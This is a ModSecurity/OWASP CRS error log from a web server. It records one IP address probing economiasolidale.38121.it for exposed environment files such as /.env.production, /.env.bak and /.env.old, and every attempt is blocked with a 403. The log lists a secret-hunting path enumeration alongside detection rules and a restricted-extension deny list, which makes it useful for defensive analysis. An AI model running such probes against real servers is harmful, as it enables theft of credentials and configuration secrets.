[Tue May 27 15:04:40.209181 2025] [:error] [pid 3435315] [client 185.146.232.218:2576] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aDW4aIMZxRfo8GmAcSTjVgAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:45.616559 2025] [:error] [pid 3435316] [client 185.146.232.218:2592] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aDW4bSw1TIthxW7dZehD5QAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:45.616893 2025] [:error] [pid 3435316] [client 185.146.232.218:2592] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aDW4bSw1TIthxW7dZehD5QAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:45.617062 2025] [:error] [pid 3435316] [client 185.146.232.218:2592] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aDW4bSw1TIthxW7dZehD5QAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:50.835853 2025] [:error] [pid 3435313] [client 185.146.232.218:6512] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.new"] [unique_id "aDW4chc-bm3P_kMSA92eHgAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:50.836174 2025] [:error] [pid 3435313] [client 185.146.232.218:6512] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.new"] [unique_id "aDW4chc-bm3P_kMSA92eHgAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:04:50.836331 2025] [:error] [pid 3435313] [client 185.146.232.218:6512] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.new"] [unique_id "aDW4chc-bm3P_kMSA92eHgAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:00.501921 2025] [:error] [pid 3435308] [client 185.146.232.218:34858] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.live"] [unique_id "aDW4fBpsgQ-cVRubiE_pIQAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:00.502307 2025] [:error] [pid 3435308] [client 185.146.232.218:34858] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.live"] [unique_id "aDW4fBpsgQ-cVRubiE_pIQAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:00.502482 2025] [:error] [pid 3435308] [client 185.146.232.218:34858] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.live"] [unique_id "aDW4fBpsgQ-cVRubiE_pIQAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:06.633994 2025] [:error] [pid 3434643] [client 185.146.232.218:34864] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev"] [unique_id "aDW4gjcx-eYxvKPm3wqRGAAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:06.634382 2025] [:error] [pid 3434643] [client 185.146.232.218:34864] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev"] [unique_id "aDW4gjcx-eYxvKPm3wqRGAAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:06.634813 2025] [:error] [pid 3434643] [client 185.146.232.218:34864] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev"] [unique_id "aDW4gjcx-eYxvKPm3wqRGAAAAAE"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:10.968173 2025] [:error] [pid 3435307] [client 185.146.232.218:19424] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aDW4hv8iIWre8jY-cNxR1gAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:10.968519 2025] [:error] [pid 3435307] [client 185.146.232.218:19424] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aDW4hv8iIWre8jY-cNxR1gAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:10.968685 2025] [:error] [pid 3435307] [client 185.146.232.218:19424] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aDW4hv8iIWre8jY-cNxR1gAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:16.969815 2025] [:error] [pid 3435317] [client 185.146.232.218:19436] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aDW4jH4CeMAvTJAIhKuk1wAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:16.970105 2025] [:error] [pid 3435317] [client 185.146.232.218:19436] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aDW4jH4CeMAvTJAIhKuk1wAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:16.970569 2025] [:error] [pid 3435317] [client 185.146.232.218:19436] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aDW4jH4CeMAvTJAIhKuk1wAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:16.970748 2025] [:error] [pid 3435317] [client 185.146.232.218:19436] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aDW4jH4CeMAvTJAIhKuk1wAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:25.409764 2025] [:error] [pid 3434646] [client 185.146.232.218:50494] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.back"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.back"] [unique_id "aDW4lQBjkyyU9gihc4sPAAAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:25.410116 2025] [:error] [pid 3434646] [client 185.146.232.218:50494] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.back"] [unique_id "aDW4lQBjkyyU9gihc4sPAAAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:25.410314 2025] [:error] [pid 3434646] [client 185.146.232.218:50494] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.back"] [unique_id "aDW4lQBjkyyU9gihc4sPAAAAAAQ"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:26.599351 2025] [:error] [pid 3434642] [client 185.146.232.218:50498] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bk"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bk"] [unique_id "aDW4lvoteRZm3UET_KXSswAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:26.599685 2025] [:error] [pid 3434642] [client 185.146.232.218:50498] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bk"] [unique_id "aDW4lvoteRZm3UET_KXSswAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:26.599864 2025] [:error] [pid 3434642] [client 185.146.232.218:50498] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bk"] [unique_id "aDW4lvoteRZm3UET_KXSswAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:36.496495 2025] [:error] [pid 3435311] [client 185.146.232.218:23370] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aDW4oMcVU5YaHAERsMJjYAAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:36.497602 2025] [:error] [pid 3435311] [client 185.146.232.218:23370] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aDW4oMcVU5YaHAERsMJjYAAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:36.497940 2025] [:error] [pid 3435311] [client 185.146.232.218:23370] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aDW4oMcVU5YaHAERsMJjYAAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:36.498112 2025] [:error] [pid 3435311] [client 185.146.232.218:23370] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aDW4oMcVU5YaHAERsMJjYAAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:42.473890 2025] [:error] [pid 3435315] [client 185.146.232.218:17422] [client 185.146.232.218] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aDW4poMZxRfo8GmAcSTjVwAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:42.474155 2025] [:error] [pid 3435315] [client 185.146.232.218:17422] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aDW4poMZxRfo8GmAcSTjVwAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:42.474508 2025] [:error] [pid 3435315] [client 185.146.232.218:17422] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aDW4poMZxRfo8GmAcSTjVwAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:42.474687 2025] [:error] [pid 3435315] [client 185.146.232.218:17422] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aDW4poMZxRfo8GmAcSTjVwAAAA4"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:51.023981 2025] [:error] [pid 3435316] [client 185.146.232.218:44690] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_backup"] [unique_id "aDW4ryw1TIthxW7dZehD5gAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:51.024304 2025] [:error] [pid 3435316] [client 185.146.232.218:44690] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env_backup"] [unique_id "aDW4ryw1TIthxW7dZehD5gAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:05:51.024467 2025] [:error] [pid 3435316] [client 185.146.232.218:44690] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env_backup"] [unique_id "aDW4ryw1TIthxW7dZehD5gAAAA8"], referer: https://economiasolidale.38121.it/
